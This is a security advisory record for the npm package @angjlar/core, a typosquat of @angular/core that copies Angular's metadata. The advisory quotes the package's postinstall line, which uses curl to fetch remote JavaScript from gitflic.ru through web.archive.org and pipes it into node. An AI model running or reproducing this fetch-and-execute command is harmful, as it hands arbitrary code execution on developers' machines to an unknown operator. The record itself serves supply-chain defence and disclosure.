MAL-2026-17534

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angjlar/core/MAL-2026-17534.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17534
Published
2026-10-05T03:33:23Z
Modified
2026-10-05T04:15:04Z
Summary
Malicious code in @angjlar/core (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9)

Package @angjlar/core impersonates @angular/core: its package.json copies the real Angular project's description ('Angular - the core framework'), author ('angular'), and repository URL (github.com/angular/angular.git), while publishing under the lookalike scope @angjlar. The postinstall lifecycle script in package.json runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node, fetching unpinned, mutable JavaScript from a non-publisher host (gitflic.ru, proxied through web.archive.org) and piping it to the node interpreter. On npm install, this gives the operator of that remote script arbitrary code execution on the installer's machine. The package has no legitimate relationship to Angular; the impersonating metadata exists solely to lure developers who mistype @angular/core into installing the dropper.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-021000",
            "import_time":  "2026-10-05T03:57:37.789439508Z",
            "modified_time":  "2026-10-05T03:33:23Z",
            "sha256":  "1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9",
            "source":  "amazon-inspector",
            "versions":  [
                "22.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @angjlar/core

Package

Name
@angjlar/core
View open source insights on deps.dev
Purl
pkg:npm/%40angjlar/core

Affected ranges

Affected versions

22.*
22.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "98a12002ca46ee184f3c7487fda81ca6b85ebbdb328061ea3161f9facd930860",
            "tlsh":  "fb513724e4f48d6323de6254dd2a4943b138495b5c38bd68b3dd009c8f0e61f61beb9a"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "core-22.2.1.tgz",
            "hashes":  {
                "sha1":  "e57af0c64e2048efdb9a0836b589e9e1101b1e3d",
                "sha512_sri":  "sha512-6PSSogtUkcFampRIGQrSIa/PfA/XNig6/KN6EbUgH30Jqyw+vkHUsbVxHP7SD9hVKAtTWwy7FfQ0RsLMHSxZug=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angjlar/core/MAL-2026-17534.json"